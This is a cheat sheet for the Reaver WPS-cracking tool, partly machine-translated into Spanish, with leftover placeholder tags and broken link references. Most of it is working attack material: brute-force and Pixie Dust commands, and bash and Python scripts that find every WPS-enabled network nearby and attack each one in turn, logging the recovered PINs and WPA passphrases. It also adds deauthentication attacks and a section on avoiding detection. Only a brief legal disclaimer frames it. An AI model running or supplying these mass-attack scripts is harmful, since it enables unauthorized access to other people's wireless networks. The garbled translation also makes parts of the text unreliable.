Reaver
Reaver Cheat Sheet
__HTML_TAG_19_ __HTML_TAG_20_ Todos los comandos
Overview¶
Reaver es una herramienta de seguridad inalámbrica especializada diseñada para explotar vulnerabilidades en implementaciones Wi-Fi Protected Setup (WPS) para recuperar contraseñas WPA/WPA2. Desarrollado por Craig Heffner, Reaver implementa un ataque de fuerza bruta contra la autenticación WPS PIN, aprovechando un defecto de diseño crítico en el protocolo WPS que permite a los atacantes recuperar el PIN en significativamente menos intentos que el máximo teórico. Esta vulnerabilidad, conocida como el ataque WPS PIN, afecta a millones de routers inalámbricos y puntos de acceso en todo el mundo.
La debilidad fundamental que Reaver explota radica en cómo WPS valida la autenticación PIN. En lugar de validar todo el PIN de 8 dígitos como unidad única, WPS valida el PIN en dos mitades separadas, reduciendo efectivamente el espacio de búsqueda de 10^8 posibles combinaciones a aproximadamente 11.000 intentos. Este defecto de diseño, combinado con el hecho de que la mayoría de las implementaciones WPS no implementan mecanismos adecuados de limitación o bloqueo, permite recuperar PINs WPS y posteriormente la contraseña WPA/WPA2 en cuestión de horas.
Reaver se ha convertido en una herramienta esencial para evaluaciones de seguridad inalámbrica y pruebas de penetración, demostrando las deficiencias de seguridad inherentes en las implementaciones de WPS. La eficacia de la herramienta ha llevado a una conciencia generalizada de las vulnerabilidades WPS y ha influenciado a muchas organizaciones para deshabilitar la funcionalidad WPS en su infraestructura inalámbrica. A pesar de las contramedidas aplicadas por algunos fabricantes, Reaver sigue siendo relevante para probar sistemas heredados e identificar redes inalámbricas vulnerables durante las evaluaciones de seguridad.
Instalación¶
Package Manager Instalación¶
Instalar Reaver a través de los administradores de paquetes del sistema:
# Ubuntu/Debian installation
sudo apt update
sudo apt install reaver
# Kali Linux (pre-installed)
reaver --help
# CentOS/RHEL installation
sudo yum install epel-release
sudo yum install reaver
# Arch Linux installation
sudo pacman -S reaver
# Verify installation
reaver --version
which reaver
Fuente Compilation¶
Compiling Reaver del código fuente:
# Install dependencies
sudo apt install build-essential libpcap-dev sqlite3 libsqlite3-dev
# Clone repository
git clone https://github.com/t6x/reaver-wps-fork-t6x.git
cd reaver-wps-fork-t6x
# Navigate to source directory
cd src
# Configure and compile
./configure
make
# Install system-wide
sudo make install
# Verify installation
reaver --version
Docker Instalación¶
# Create Dockerfile for Reaver
cat > Dockerfile << 'EOF'
FROM kalilinux/kali-rolling
RUN apt-get update && apt-get install -y reaver aircrack-ng
WORKDIR /workspace
CMD ["/bin/bash"]
EOF
# Build container
docker build -t reaver-toolkit .
# Run with network access
docker run -it --net=host --privileged reaver-toolkit
# Mount workspace
docker run -it --net=host --privileged -v $(pwd):/workspace reaver-toolkit
Uso básico¶
Target Discovery¶
Descubrir puntos de acceso habilitados para WPS:
# Put wireless interface in monitor mode
sudo airmon-ng start wlan0
# Scan for WPS-enabled networks
wash -i wlan0mon
# Detailed WPS scan
wash -i wlan0mon -C
# Scan specific channel
wash -i wlan0mon -c 6
# Save scan results
wash -i wlan0mon -o wps_targets.txt
# Show only networks with WPS enabled
wash -i wlan0mon|grep "Yes"
Basic WPS Ataque¶
Realización de ataque de fuerza bruta básica WPS PIN:
# Basic Reaver attack
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
# Attack with specific channel
reaver -i wlan0mon -b 00:11:22:33:44:55 -c 6 -vv
# Attack with delay between attempts
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 1 -vv
# Attack with session file
reaver -i wlan0mon -b 00:11:22:33:44:55 -s session.wpc -vv
# Resume previous session
reaver -i wlan0mon -b 00:11:22:33:44:55 -s session.wpc -vv
Opciones avanzadas de ataque¶
Configuraciones avanzadas de ataque Reaver:
# Ignore lock warnings
reaver -i wlan0mon -b 00:11:22:33:44:55 -L -vv
# No NACKS (for some routers)
reaver -i wlan0mon -b 00:11:22:33:44:55 -N -vv
# Disable associated requests
reaver -i wlan0mon -b 00:11:22:33:44:55 -A -vv
# Use small DH keys
reaver -i wlan0mon -b 00:11:22:33:44:55 -S -vv
# Specify timeout
reaver -i wlan0mon -b 00:11:22:33:44:55 -T 1 -vv
Características avanzadas¶
PIN Management¶
Gestión de intentos de PIN WPS y recuperación:
# Start from specific PIN
reaver -i wlan0mon -b 00:11:22:33:44:55 -p 12345670 -vv
# Use PIN from file
reaver -i wlan0mon -b 00:11:22:33:44:55 -P pin_list.txt -vv
# Generate PIN list
crunch 8 8 0123456789 > pin_list.txt
# Check specific PIN
reaver -i wlan0mon -b 00:11:22:33:44:55 -p 12345670 -1 -vv
# Show current PIN attempt
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv|grep "Trying pin"
Session Management¶
Gestión de las sesiones de ataque de Reaver:
# Create named session
reaver -i wlan0mon -b 00:11:22:33:44:55 -s target1.wpc -vv
# List existing sessions
ls ~/.reaver/
# View session details
sqlite3 ~/.reaver/target1.wpc "SELECT * FROM status;"
# Delete session
rm ~/.reaver/target1.wpc
# Backup session
cp ~/.reaver/target1.wpc target1_backup.wpc
Limitación de tarifas y Timing¶
Controlar el tiempo de ataque y limitar la tasa:
# Delay between PIN attempts (seconds)
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 5 -vv
# Delay after 10 failures
reaver -i wlan0mon -b 00:11:22:33:44:55 -r 10:60 -vv
# Maximum number of attempts
reaver -i wlan0mon -b 00:11:22:33:44:55 -g 100 -vv
# Timeout for each attempt
reaver -i wlan0mon -b 00:11:22:33:44:55 -T 5 -vv
# Recurring delay pattern
reaver -i wlan0mon -b 00:11:22:33:44:55 -R 3 -vv
Pixie Dust Attack¶
Implementación del ataque del polvo de Pixie (offline):
# Enable Pixie Dust attack
reaver -i wlan0mon -b 00:11:22:33:44:55 -K -vv
# Pixie Dust with specific parameters
reaver -i wlan0mon -b 00:11:22:33:44:55 -K 1 -vv
# Save Pixie Dust data
reaver -i wlan0mon -b 00:11:22:33:44:55 -K -O pixie_data.txt -vv
# Use external Pixie Dust tool
pixiewps -e pke -r pkr -s hash1 -z hash2 -a authkey -n e-nonce
# Automated Pixie Dust with OneShot
python3 oneshot.py -i wlan0mon -b 00:11:22:33:44:55 -K
Automation Scripts¶
Mass WPS Testing¶
#!/bin/bash
# Mass WPS testing script
INTERFACE="wlan0mon"
RESULTS_DIR="reaver_results"
DELAY=2
mkdir -p $RESULTS_DIR
echo "Starting mass WPS testing"
# Discover WPS targets
echo "Discovering WPS-enabled targets..."
wash -i $INTERFACE -C > $RESULTS_DIR/wps_targets.txt
# Extract target information
grep "Yes" $RESULTS_DIR/wps_targets.txt|while read line; do
BSSID=$(echo $line|awk '\\\\{print $1\\\\}')
CHANNEL=$(echo $line|awk '\\\\{print $2\\\\}')
ESSID=$(echo $line|awk '\\\\{print $6\\\\}')
echo "Testing target: $ESSID ($BSSID) on channel $CHANNEL"
# Create target-specific log
LOG_FILE="$RESULTS_DIR/reaver_$\\\\{BSSID//:/_\\\\}.log"
SESSION_FILE="$RESULTS_DIR/session_$\\\\{BSSID//:/_\\\\}.wpc"
# Try Pixie Dust attack first
echo "Attempting Pixie Dust attack on $BSSID"
timeout 300 reaver -i $INTERFACE -b $BSSID -c $CHANNEL -K -vv -s $SESSION_FILE > $LOG_FILE 2>&1
# Check if Pixie Dust was successful
if grep -q "WPS PIN:" $LOG_FILE; then
echo "SUCCESS: Pixie Dust attack successful for $BSSID"
grep "WPS PIN:\|WPA PSK:" $LOG_FILE >> $RESULTS_DIR/successful_attacks.txt
continue
fi
# If Pixie Dust failed, try regular brute force
echo "Pixie Dust failed, attempting brute force on $BSSID"
timeout 3600 reaver -i $INTERFACE -b $BSSID -c $CHANNEL -d $DELAY -vv -s $SESSION_FILE >> $LOG_FILE 2>&1 &
# Store PID for later management
echo $! > $RESULTS_DIR/reaver_$\\\\{BSSID//:/_\\\\}.pid
sleep 10 # Brief delay between targets
done
echo "Mass WPS testing initiated. Check $RESULTS_DIR for results."
Automated PIN Recuperación¶
#!/usr/bin/env python3
# Automated WPS PIN recovery script
import subprocess
import re
import time
import json
from datetime import datetime
class ReaverAutomation:
def __init__(self, interface):
self.interface = interface
self.results = \\\\{\\\\}
self.active_attacks = \\\\{\\\\}
def discover_targets(self):
"""Discover WPS-enabled targets"""
cmd = ["wash", "-i", self.interface, "-C"]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
targets = []
for line in result.stdout.split('\n'):
if 'Yes' in line: # WPS enabled
parts = line.split()
if len(parts) >= 6:
target = \\\\{
'bssid': parts[0],
'channel': parts[1],
'rssi': parts[2],
'wps_version': parts[3],
'wps_locked': parts[4],
'essid': ' '.join(parts[5:])
\\\\}
targets.append(target)
return targets
except Exception as e:
print(f"Error discovering targets: \\\\{e\\\\}")
return []
def pixie_dust_attack(self, target):
"""Attempt Pixie Dust attack"""
cmd = [
"reaver",
"-i", self.interface,
"-b", target['bssid'],
"-c", target['channel'],
"-K", # Pixie Dust
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
# Parse output for PIN and PSK
pin_match = re.search(r'WPS PIN: (\d+)', result.stdout)
psk_match = re.search(r'WPA PSK: (.+)', result.stdout)
if pin_match and psk_match:
return \\\\{
'success': True,
'method': 'pixie_dust',
'pin': pin_match.group(1),
'psk': psk_match.group(1),
'time': datetime.now().isoformat()
\\\\}
else:
return \\\\{'success': False, 'method': 'pixie_dust'\\\\}
except subprocess.TimeoutExpired:
return \\\\{'success': False, 'method': 'pixie_dust', 'error': 'timeout'\\\\}
except Exception as e:
return \\\\{'success': False, 'method': 'pixie_dust', 'error': str(e)\\\\}
def brute_force_attack(self, target, max_time=3600):
"""Attempt brute force attack"""
session_file = f"session_\\\\{target['bssid'].replace(':', '_')\\\\}.wpc"
cmd = [
"reaver",
"-i", self.interface,
"-b", target['bssid'],
"-c", target['channel'],
"-d", "2", # 2 second delay
"-s", session_file,
"-vv"
]
try:
process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, text=True)
start_time = time.time()
while True:
if time.time() - start_time > max_time:
process.terminate()
return \\\\{'success': False, 'method': 'brute_force', 'error': 'timeout'\\\\}
line = process.stdout.readline()
if not line:
break
# Check for successful PIN recovery
pin_match = re.search(r'WPS PIN: (\d+)', line)
psk_match = re.search(r'WPA PSK: (.+)', line)
if pin_match and psk_match:
process.terminate()
return \\\\{
'success': True,
'method': 'brute_force',
'pin': pin_match.group(1),
'psk': psk_match.group(1),
'time': datetime.now().isoformat()
\\\\}
# Check for rate limiting
if 'rate limiting' in line.lower():
print(f"Rate limiting detected for \\\\{target['bssid']\\\\}")
time.sleep(60) # Wait before continuing
process.terminate()
return \\\\{'success': False, 'method': 'brute_force'\\\\}
except Exception as e:
return \\\\{'success': False, 'method': 'brute_force', 'error': str(e)\\\\}
def attack_target(self, target):
"""Attack single target with multiple methods"""
print(f"Attacking \\\\{target['essid']\\\\} (\\\\{target['bssid']\\\\})")
# Try Pixie Dust first
result = self.pixie_dust_attack(target)
if result['success']:
print(f"SUCCESS: Pixie Dust attack successful for \\\\{target['bssid']\\\\}")
self.results[target['bssid']] = result
return result
# If Pixie Dust failed, try brute force
print(f"Pixie Dust failed, attempting brute force for \\\\{target['bssid']\\\\}")
result = self.brute_force_attack(target)
if result['success']:
print(f"SUCCESS: Brute force attack successful for \\\\{target['bssid']\\\\}")
else:
print(f"FAILED: All attacks failed for \\\\{target['bssid']\\\\}")
self.results[target['bssid']] = result
return result
def run_mass_attack(self):
"""Run attacks against all discovered targets"""
targets = self.discover_targets()
if not targets:
print("No WPS-enabled targets found")
return
print(f"Found \\\\{len(targets)\\\\} WPS-enabled targets")
for target in targets:
self.attack_target(target)
time.sleep(5) # Brief delay between targets
self.generate_report()
def generate_report(self):
"""Generate attack results report"""
report = \\\\{
'timestamp': datetime.now().isoformat(),
'interface': self.interface,
'total_targets': len(self.results),
'successful_attacks': len([r for r in self.results.values() if r['success']]),
'results': self.results
\\\\}
with open('reaver_report.json', 'w') as f:
json.dump(report, f, indent=2)
print(f"Report saved to reaver_report.json")
print(f"Successful attacks: \\\\{report['successful_attacks']\\\\}/\\\\{report['total_targets']\\\\}")
# Usage
if __name__ == "__main__":
automation = ReaverAutomation("wlan0mon")
automation.run_mass_attack()
WPS Vulnerability Scanner¶
#!/usr/bin/env python3
# WPS vulnerability scanner
import subprocess
import re
import csv
from datetime import datetime
class WPSScanner:
def __init__(self, interface):
self.interface = interface
self.vulnerabilities = []
def scan_wps_networks(self):
"""Scan for WPS-enabled networks"""
cmd = ["wash", "-i", self.interface, "-C"]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=120)
networks = []
for line in result.stdout.split('\n'):
if line.strip() and not line.startswith('BSSID'):
parts = line.split()
if len(parts) >= 5:
network = \\\\{
'bssid': parts[0],
'channel': parts[1],
'rssi': parts[2],
'wps_version': parts[3],
'wps_locked': parts[4],
'wps_enabled': 'Yes' in line,
'essid': ' '.join(parts[5:]) if len(parts) > 5 else 'Hidden'
\\\\}
networks.append(network)
return networks
except Exception as e:
print(f"Error scanning networks: \\\\{e\\\\}")
return []
def test_pixie_dust_vulnerability(self, network):
"""Test if network is vulnerable to Pixie Dust attack"""
cmd = [
"reaver",
"-i", self.interface,
"-b", network['bssid'],
"-c", network['channel'],
"-K", # Pixie Dust
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
# Check for Pixie Dust vulnerability indicators
if 'WPS PIN:' in result.stdout:
return 'vulnerable'
elif 'Pixie Dust attack failed' in result.stdout:
return 'not_vulnerable'
elif 'timeout' in result.stderr.lower():
return 'timeout'
else:
return 'unknown'
except subprocess.TimeoutExpired:
return 'timeout'
except Exception as e:
return 'error'
def assess_wps_security(self, network):
"""Assess WPS security configuration"""
vulnerabilities = []
# Check if WPS is enabled
if network['wps_enabled']:
vulnerabilities.append('WPS_ENABLED')
# Check if WPS is locked
if network['wps_locked'] == 'No':
vulnerabilities.append('WPS_NOT_LOCKED')
# Check WPS version
if network['wps_version'] in ['1.0', '2.0']:
vulnerabilities.append('VULNERABLE_WPS_VERSION')
# Test Pixie Dust vulnerability
pixie_result = self.test_pixie_dust_vulnerability(network)
if pixie_result == 'vulnerable':
vulnerabilities.append('PIXIE_DUST_VULNERABLE')
return vulnerabilities
def generate_vulnerability_report(self, networks):
"""Generate comprehensive vulnerability report"""
report_data = []
for network in networks:
if network['wps_enabled']:
vulns = self.assess_wps_security(network)
report_entry = \\\\{
'timestamp': datetime.now().isoformat(),
'bssid': network['bssid'],
'essid': network['essid'],
'channel': network['channel'],
'rssi': network['rssi'],
'wps_version': network['wps_version'],
'wps_locked': network['wps_locked'],
'vulnerabilities': ','.join(vulns),
'risk_level': self.calculate_risk_level(vulns)
\\\\}
report_data.append(report_entry)
self.vulnerabilities.extend(vulns)
# Save to CSV
with open('wps_vulnerability_report.csv', 'w', newline='') as csvfile:
fieldnames = ['timestamp', 'bssid', 'essid', 'channel', 'rssi',
'wps_version', 'wps_locked', 'vulnerabilities', 'risk_level']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
for entry in report_data:
writer.writerow(entry)
return report_data
def calculate_risk_level(self, vulnerabilities):
"""Calculate risk level based on vulnerabilities"""
if 'PIXIE_DUST_VULNERABLE' in vulnerabilities:
return 'CRITICAL'
elif 'WPS_NOT_LOCKED' in vulnerabilities and 'WPS_ENABLED' in vulnerabilities:
return 'HIGH'
elif 'WPS_ENABLED' in vulnerabilities:
return 'MEDIUM'
else:
return 'LOW'
def run_assessment(self):
"""Run complete WPS security assessment"""
print("Starting WPS vulnerability assessment...")
networks = self.scan_wps_networks()
print(f"Found \\\\{len(networks)\\\\} networks")
wps_networks = [n for n in networks if n['wps_enabled']]
print(f"Found \\\\{len(wps_networks)\\\\} WPS-enabled networks")
if wps_networks:
report = self.generate_vulnerability_report(wps_networks)
# Summary statistics
critical = len([r for r in report if r['risk_level'] == 'CRITICAL'])
high = len([r for r in report if r['risk_level'] == 'HIGH'])
medium = len([r for r in report if r['risk_level'] == 'MEDIUM'])
print(f"\nVulnerability Summary:")
print(f"Critical: \\\\{critical\\\\}")
print(f"High: \\\\{high\\\\}")
print(f"Medium: \\\\{medium\\\\}")
print(f"Report saved to wps_vulnerability_report.csv")
else:
print("No WPS-enabled networks found")
# Usage
if __name__ == "__main__":
scanner = WPSScanner("wlan0mon")
scanner.run_assessment()
Integración Ejemplos¶
Aircrack-ng Integration¶
#!/bin/bash
# Reaver and Aircrack-ng integration
INTERFACE="wlan0mon"
TARGET_BSSID="00:11:22:33:44:55"
TARGET_CHANNEL="6"
echo "Starting integrated WPS/WPA attack"
# Start airodump-ng to capture handshakes
airodump-ng -c $TARGET_CHANNEL -w capture --bssid $TARGET_BSSID $INTERFACE &
AIRODUMP_PID=$!
# Start Reaver attack
reaver -i $INTERFACE -b $TARGET_BSSID -c $TARGET_CHANNEL -vv &
REAVER_PID=$!
# Monitor for successful WPS crack
while kill -0 $REAVER_PID 2>/dev/null; do
if grep -q "WPS PIN:" reaver.log 2>/dev/null; then
echo "WPS PIN recovered!"
kill $REAVER_PID
break
fi
sleep 10
done
# If WPS failed, try WPA handshake capture
if ! grep -q "WPS PIN:" reaver.log 2>/dev/null; then
echo "WPS attack failed, attempting handshake capture"
# Send deauth packets to force handshake
aireplay-ng -0 5 -a $TARGET_BSSID $INTERFACE
# Wait for handshake
sleep 30
# Stop airodump-ng
kill $AIRODUMP_PID
# Check for captured handshake
if aircrack-ng -w wordlist.txt capture-01.cap; then
echo "WPA passphrase recovered via handshake attack"
fi
fi
echo "Attack completed"
Kismet Integration¶
#!/usr/bin/env python3
# Reaver and Kismet integration
import subprocess
import json
import time
class ReaverKismetIntegration:
def __init__(self, kismet_server="localhost:2501"):
self.kismet_server = kismet_server
self.wps_targets = []
def get_kismet_devices(self):
"""Get device list from Kismet"""
cmd = [
"curl",
"-s",
f"http://\\\\{self.kismet_server\\\\}/devices/views/all/devices.json"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True)
devices = json.loads(result.stdout)
wps_devices = []
for device in devices:
if 'dot11.device' in device:
dot11 = device['dot11.device']
if 'dot11.device.wps_config_methods' in dot11:
wps_devices.append(\\\\{
'bssid': device['kismet.device.base.macaddr'],
'ssid': dot11.get('dot11.device.last_beaconed_ssid', 'Hidden'),
'channel': dot11.get('dot11.device.channel', 'Unknown'),
'signal': device.get('kismet.device.base.signal', \\\\{\\\\}).get('kismet.common.signal.last_signal', 0)
\\\\})
return wps_devices
except Exception as e:
print(f"Error getting Kismet devices: \\\\{e\\\\}")
return []
def prioritize_targets(self, devices):
"""Prioritize targets based on signal strength and other factors"""
# Sort by signal strength (higher is better)
sorted_devices = sorted(devices, key=lambda x: x['signal'], reverse=True)
# Filter out weak signals
strong_devices = [d for d in sorted_devices if d['signal'] > -70]
return strong_devices
def attack_target(self, target, interface="wlan0mon"):
"""Attack target with Reaver"""
cmd = [
"reaver",
"-i", interface,
"-b", target['bssid'],
"-c", str(target['channel']),
"-K", # Try Pixie Dust first
"-vv"
]
try:
result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
if 'WPS PIN:' in result.stdout:
return \\\\{
'success': True,
'method': 'pixie_dust',
'output': result.stdout
\\\\}
else:
# Try brute force if Pixie Dust fails
cmd[cmd.index('-K')] = '-d'
cmd.insert(cmd.index('-d') + 1, '2')
result = subprocess.run(cmd, capture_output=True, text=True, timeout=1800)
if 'WPS PIN:' in result.stdout:
return \\\\{
'success': True,
'method': 'brute_force',
'output': result.stdout
\\\\}
else:
return \\\\{'success': False, 'output': result.stdout\\\\}
except subprocess.TimeoutExpired:
return \\\\{'success': False, 'error': 'timeout'\\\\}
except Exception as e:
return \\\\{'success': False, 'error': str(e)\\\\}
def run_integrated_attack(self, interface="wlan0mon"):
"""Run integrated Kismet + Reaver attack"""
print("Getting WPS targets from Kismet...")
devices = self.get_kismet_devices()
if not devices:
print("No WPS devices found in Kismet")
return
print(f"Found \\\\{len(devices)\\\\} WPS-enabled devices")
# Prioritize targets
targets = self.prioritize_targets(devices)
print(f"Attacking \\\\{len(targets)\\\\} prioritized targets")
for target in targets:
print(f"Attacking \\\\{target['ssid']\\\\} (\\\\{target['bssid']\\\\})")
result = self.attack_target(target, interface)
if result['success']:
print(f"SUCCESS: \\\\{target['ssid']\\\\} cracked via \\\\{result['method']\\\\}")
# Log successful attack
with open('successful_attacks.log', 'a') as f:
f.write(f"\\\\{time.ctime()\\\\}: \\\\{target['ssid']\\\\} (\\\\{target['bssid']\\\\}) - \\\\{result['method']\\\\}\n")
else:
print(f"FAILED: \\\\{target['ssid']\\\\} attack unsuccessful")
time.sleep(5) # Brief delay between attacks
# Usage
if __name__ == "__main__":
integration = ReaverKismetIntegration()
integration.run_integrated_attack("wlan0mon")
Troubleshooting¶
Common Issues¶
** Problemas de interfaz:**
# Check wireless interface
iwconfig
# Put interface in monitor mode
sudo airmon-ng start wlan0
# Check monitor mode interface
iwconfig wlan0mon
# Kill conflicting processes
sudo airmon-ng check kill
# Restart network manager
sudo systemctl restart NetworkManager
** Problemas de bloqueo de los programas:**
# Check if WPS is locked
wash -i wlan0mon|grep "Yes.*Yes"
# Wait for lock timeout
reaver -i wlan0mon -b 00:11:22:33:44:55 -L -vv
# Use longer delays
reaver -i wlan0mon -b 00:11:22:33:44:55 -d 60 -vv
# Try different attack methods
reaver -i wlan0mon -b 00:11:22:33:44:55 -N -A -vv
** Problemas de asociación:**
# Check signal strength
wash -i wlan0mon|grep BSSID
# Move closer to target
# Increase transmission power (if legal)
sudo iwconfig wlan0mon txpower 20
# Use external antenna
# Check for interference
airodump-ng wlan0mon
Debugging¶
Permite depuración y registro detallados:
# Maximum verbosity
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv
# Log to file
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv 2>&1|tee reaver.log
# Monitor system logs
tail -f /var/log/syslog|grep reaver
# Check wireless driver logs
dmesg|grep -i wireless
# Monitor network traffic
tcpdump -i wlan0mon -w reaver_traffic.pcap
Security Considerations¶
Consideraciones jurídicas y éticas¶
Authorized Testing Only: - Sólo las redes de prueba que posee o tienen permiso explícito para probar - Obtener autorización escrita antes de realizar ataques WPS - Siga las leyes y reglamentos locales sobre pruebas de seguridad inalámbrica - Respetar la privacidad y la confidencialidad del tráfico de red - Documentar todas las actividades de prueba para el cumplimiento
**Responsable Disclosure: # - Informar vulnerabilidades a los propietarios de redes - Proporcionar orientación para la rehabilitación - Permitir tiempo razonable para las correcciones - Seguir las prácticas coordinadas de divulgación - Mantener la confidencialidad durante el proceso de divulgación
Operational Security¶
Evitación de la detección: - Utilizar retrasos apropiados entre los intentos - Monitor para respuestas defensivas - Evite las horas de uso máximo - Use antenas direccionales cuando sea posible - Aplicar medidas de seguridad operacional adecuadas
** Impacto de la red:** - Minimizar la perturbación de los usuarios legítimos - Evite ataques excesivos de deautenticación - Supervisar el impacto del rendimiento de la red - Usar niveles de potencia adecuados - Respetar los requisitos de disponibilidad de la red
Referencias¶
- [Repositorio GitHub](URL_25__
- WPS Protocol Specification_
- [Vulnerabilidades de seguridad de los programas](URL_27__
- [Guía de Pruebas de Seguridad Inalámbrica](URL_28__
- [IEEE 802.11 Estándares](URL_29__